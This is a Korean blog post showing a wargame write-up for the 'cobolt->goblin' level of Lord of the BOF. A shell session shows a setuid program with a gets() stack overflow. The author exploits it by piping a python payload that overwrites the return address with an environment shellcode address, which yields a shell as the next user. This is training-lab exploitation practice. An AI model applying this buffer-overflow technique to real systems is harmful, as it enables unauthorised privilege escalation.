-
[lob]cobolt->goblin공부/LOB 2014. 7. 30. 20:00
login: cobolt
Password:
Last login: Thu May 22 21:34:03 from 192.168.135.1
[cobolt@localhost cobolt]$ ls
addr addr.c egg egg.c goblin goblin.c goblin2 sg
[cobolt@localhost cobolt]$ cat goblin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- goblin
- small buffer + stdin
*/
int main()
{
char buffer[16];
gets(buffer);
printf("%s\n", buffer);
}
[cobolt@localhost cobolt]$ ls -al
total 100
drwx------ 3 cobolt cobolt 4096 May 22 20:59 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 cobolt cobolt 2379 Jul 14 16:54 .bash_history
-rw-r--r-- 1 cobolt cobolt 24 Feb 26 2010 .bash_logout
-rw-r--r-- 1 cobolt cobolt 230 Feb 26 2010 .bash_profile
-rw-r--r-- 1 cobolt cobolt 124 Feb 26 2010 .bashrc
-rwxr-xr-x 1 cobolt cobolt 333 Feb 26 2010 .emacs
-rw-r--r-- 1 cobolt cobolt 3394 Feb 26 2010 .screenrc
-rwxrwxr-x 1 cobolt cobolt 11832 May 22 20:55 addr
-rw-rw-r-- 1 cobolt cobolt 65 May 22 20:55 addr.c
-rwxrwxr-x 1 cobolt cobolt 13089 May 22 20:54 egg
-rw-rw-r-- 1 cobolt cobolt 1511 May 22 20:54 egg.c
-rwsr-sr-x 1 goblin goblin 11824 Feb 26 2010 goblin
-rw-r--r-- 1 root root 193 Mar 29 2010 goblin.c
-rwxrwxr-x 1 cobolt cobolt 11824 May 22 20:59 goblin2
drwxrwxr-x 2 cobolt cobolt 4096 May 22 21:49 sg
[cobolt@localhost cobolt]$ cat goblin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- goblin
- small buffer + stdin
*/
int main()
{
char buffer[16];
gets(buffer);
printf("%s\n", buffer);
}
[cobolt@localhost cobolt]$ ls
addr addr.c egg egg.c goblin goblin.c goblin2 sg
[cobolt@localhost cobolt]$ ./egg
Using address: 0xbffffb18
[cobolt@localhost cobolt]$ ./addr
0xbffff5d6
[cobolt@localhost cobolt]$ (python -c'print "a"*20+"\xd6\xf5\xff\xbf"';cat)|./goblin
aaaaaaaaaaaaaaaaaaaa了
ls
ls: .: Permission denied
my-pass
euid = 503
hackers proof'공부 > LOB' 카테고리의 다른 글
[lob] wolfman -> darkelf (0) 2014.07.30 [lob] orc -> wolfman (0) 2014.07.30 [lob]goblin->orc (0) 2014.07.30 [lob]cobolt->goblin (0) 2014.07.30 [lob] greblin->cobolt (0) 2014.07.30 [lob] gate->gremlin (0) 2014.07.30